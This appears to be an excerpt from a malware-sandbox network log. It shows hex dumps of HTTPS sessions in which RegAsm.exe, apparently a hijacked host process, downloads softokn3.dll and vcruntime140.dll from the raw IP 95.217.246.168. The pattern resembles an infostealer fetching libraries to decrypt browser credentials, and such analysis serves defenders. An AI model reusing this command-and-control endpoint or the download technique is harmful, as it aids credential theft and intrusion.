2024-04-26 19:35:40 UTC	16384	IN	Data Raw: 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d 48 11 1e 10 89 ca 09 c2 0f 84 b1 fe ff Data Ascii: w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SLH
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10 68 78 fc 1b 10 6a 0e e8 0a 8f 02 00 83 Data Ascii: $pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hhhxj
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00 00 8b 45 08 ff 70 1c 68 20 85 1c 10 eb Data Ascii: o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$hEph
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24 18 89 d8 83 c0 04 68 fc 01 00 00 6a 00 Data Ascii: h\|D$Fh\|$urVd@\|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$\|$D$pdD$H<@D>D$1V>D$>D$>D$\$hj
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff ff 8b 10 8b 4d e8 83 c4 10 5e 5f 5b 5d Data Ascii: HukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-MmM^_[]
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74 09 85 ff 75 0a e9 69 03 00 00 c6 44 02 Data Ascii: WtL$ u\|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$RttuiD
2024-04-26 19:35:40 UTC	16384	IN	Data Raw: c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00 00 00 e9 36 f8 ff ff 8b 40 14 e9 d1 e9 Data Ascii: D$$D$@@L$;A<\|$7h't$D$$hH\|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$6@

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49752	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:42 UTC	159	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 19:35:43 UTC	246	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:42 GMT Content-Type: application/octet-stream Content-Length: 257872 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-3ef50" Accept-Ranges: bytes
2024-04-26 19:35:43 UTC	16138	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 f0 81 c4 08 01 00 00 5e 5f 5b 5d c3 8b 5d 0c c7 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(^_[]]
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 bf 4d 02 00 83 c4 04 a3 38 9a 03 10 ff 75 0c e8 Data Ascii: kWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGPM8u
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 00 00 ba 01 e0 01 e0 33 11 be 01 f1 01 f1 33 71 Data Ascii: AAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q33q
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 02 00 00 3d 21 40 00 00 0f 85 37 06 00 00 83 7c Data Ascii: !=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#=!@7\|
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-04-26 19:35:43 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-04-26 19:35:44 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49753	95.217.246.168	443	7344	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-04-26 19:35:44 UTC	163	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:109.0) Gecko/20100101 Firefox/115.0 Host: 95.217.246.168 Cache-Control: no-cache
2024-04-26 19:35:45 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Apr 2024 19:35:45 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-04-26 19:35:45 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-04-26 19:35:45 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-04-26 19:35:45 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
